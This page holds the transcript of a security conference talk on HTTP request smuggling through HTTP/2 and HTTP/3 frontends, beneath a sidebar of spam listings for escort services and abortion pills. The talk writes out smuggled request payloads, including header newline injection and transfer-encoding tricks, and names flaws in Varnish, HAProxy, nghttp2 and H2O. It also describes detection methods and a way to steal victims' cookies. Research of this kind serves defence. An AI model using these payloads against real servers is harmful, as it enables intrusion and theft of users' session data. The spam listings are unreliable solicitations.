The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verifiedSector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
Sector 18, Noida Call girls :8448380779 Model Escorts | 100% verified
 
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdfThe Top App Development Trends Shaping the Industry in 2024-25 .pdf
The Top App Development Trends Shaping the Industry in 2024-25 .pdf
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 

HTTP Request Smuggling via higher HTTP versions

  • 1. Emil Lerner HTTP Request Smuggling via higher HTTP versions
  • 2. Emil Lerner independentsecurityresearcher CTO at WunderFund.io Bushwhackers CTF team @emil_lerner @neex
  • 4. Reverse proxy HTTP Response HTTP Request Client HTTP Response HTTP Request Frontend Server Backend Server
  • 5. HTTP keep-alive HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 Client Server
  • 6. HTTP/1.1 body transfer Content-Length header Content-Length: 100 Here goes 100 bytes of the request body. Transfer-Encoding: chunked ff 10 0 Here goes 255-byte chunk Another chunk Chunked encoding
  • 7. HTTP keep-alive (to backend) HTTP Response 1 HTTP Request 1 HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 HTTP Response 2 HTTP Request 2 Single backend connection Client2 connection Client1 connection Client1 Client2 Frontend Server Backend Server
  • 8. HTTP Request Smuggling Old & known attack Gained a lot of attention after James Kettle's talk on BH USA 2019 He discovered a lot of new techniques
  • 9. HTTP Request Smuggling An attacker sends a malicious request It is parsed as a single request by the frontend and is forwarded to the backend Backend parses it as two separate requests
  • 10. POST / HTTP/1.1 Content-Length: 100 0 Transfer-Encoding : chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request HTTP Request Smuggling
  • 11. HTTP Request Smuggling It's all about Content-Length / Transfer-Encoding Transfer-Encoding has precedence We need to "smuggle" Transfer-Encoding to backend unprocessed by the frontend
  • 12. HTTP Request Smuggling POST / HTTP/1.1 Content-Length: 100 Transfer-Encoding: identity, 0 chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request
  • 13. Exploitation Accessing internal endpoints Cache poisoning Stealing other users’ requests
  • 14. Exploitation: stealing requests Attacker→Frontend Victim→Frontend GET / HTTP/1.1 ... POST /save HTTP/1.1 Transfer-Encoding : chunked GET / HTTP/1.1 Cookie: secret GET / HTTP/1.1 Transfer-Encoding : chunked ... POST /save HTTP/1.1 data=GET / HTTP/1.1 Cookie: secret Frontend→Backend
  • 15. Exploitation: stealing requests The victim's request is appended to ours Most frameworks are OK with newlines in forms Victim's cookies are saved to our profile, PMs or other places where we can view them later
  • 16. HTTP/2 overview Widely adopted by now Binary protocol (no special chars) Almost always terminated at frontend
  • 17. HTTP/2 termination :status 200 PRI * HTTP/2.0 <binary> :method GET HTTP/1.1 200 OK GET / HTTP/1.1 Frontend Backend Client
  • 18. HTTP/2 body transfer Request body is transferred in binary frames Content-Length not required, but allowed Transfer-Encoding: chunked has no effect
  • 19. Potential bug #1: content-length conflicts actual length Client→Frontend :method POST :authority host.com XGET /internal HTTP/1.1 ... content-length: 1 POST / HTTP/1.1 Host: host.com Content-Length: 1 XGET /internal HTTP/1.1 ... Frontend→Backend body
  • 20. Potential bug #2: no content-length forwarding Client→Frontend :method :authority host.com GET /internal HTTP/1.1 GET GET / HTTP/1.1 Host: host.com GET /internal HTTP/1.1 Frontend→Backend body
  • 21. Potential bug #3: content-length conflicting transfer-encoding Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 22. HTTP/2 header validation Headers names and values are binary strings Names and values can contain newlines Names can contain colons
  • 23. Potential bug #4: newlines in headers Client→Frontend :method GET :authority host.com x: ... ⏎⏎GET /internal HTTP/1.1 GET / HTTP/1.1 Host: host.com X: GET /internal HTTP/1.1 ... Frontend→Backend
  • 24. Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding : chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 transfer-encoding : chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 25. Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer_encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer_Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 26. Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunKed POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunKed 0 GET /internal HTTP/1.1 ... Frontend→Backend body
  • 27. What does the RFC say? RFC 7540 mentions Intermediary Encapsulation Attacks in 10.3 Basically says "implementation must reject things it can't handle" :) Explicitly mentions newlines and x00
  • 28. Detection idea #1: make backend expect more data Craft a request such that Backend expects more data Frontend thinks it sent the whole request The request will hang Implemented in James Kettle's Burp plugin (for HTTP/1.1)
  • 29. Detection idea #1: make backend expect more data :method POST content-length: 5 h:⏎transfer-encoding:chunked fff Frontend interprets this Backend interprets this Frontend thinks body is finished Backend expects more data and hangs
  • 30. Chunked encoding should never be parsed in HTTP/2 If the response depends on the chunked encoding validness, it is a possible vulnerability There're some false positives Detection idea #2: chunked body parsing
  • 31. Detection idea #2: chunked body parsing :status 400 :method POST invalid chunked body transfer-encoding : chunked HTTP/1.1 400 POST / HTTP/1.1 transfer-encoding : chunked invalid chunked body Frontend Backend Client
  • 32. Detection idea #3: content-length parsing Send something like x:x⏎content-length:1000 If the response depends on the value, it's a possible vulnerability Even more false positives :(
  • 33. False positive scenario HTTP/2 HTTP/2 termination HTTP/1 processing HTTP/1.1 Frontend Backend Client
  • 34. Varnish flaw Client→Varnish :method GET :authority host.com GET /internal HTTP/1.1 ... content-length: 0 GET / HTTP/1.1 Host: host.com content-length: 0 GET /internal HTTP/1.1 ... Varnish→Backend body
  • 35. Potential bug #6: RFC 8441 Designed for WebSockets over HTTP/2 A client sends CONNECT method and sets the :protocol special header Intermediary translates it to Upgrade
  • 36. Haproxy & nghttp2 flaws Client→Frontend :method :authority host.com GET /internal HTTP/1.1 ... CONNECT :protocol websocket GET / HTTP/1.1 Host: host.com Connection: upgrade Upgrade: websocket GET /internal HTTP/1.1 ... Frontend→Backend body
  • 37. Open problem: one-way size discrepancy Attacks work if the backend reads less data than the frontend Detection methods work if the backend expects more data What if the first is achievable, but the second is not possible?
  • 38. Client→Frontend Frontend→Backend H2O http3 (QUIC) flaw :method POST content-length: 100 0 GET /internal HTTP/1.1 ... x:x⏎transfer-encoding:chunked POST / HTTP/1.1 Content-length: 100 X: x Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... body
  • 39. Automation I've implemented http2smugl tool It performs automatic vulnerability detection using the discussed methods Also it supports sending "invalid" queries via custom HTTP/2 implementation
  • 40. Further research needed HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched Stable detection methods wanted Putting space + path into :method can lead to hitting internal endpoints and Host override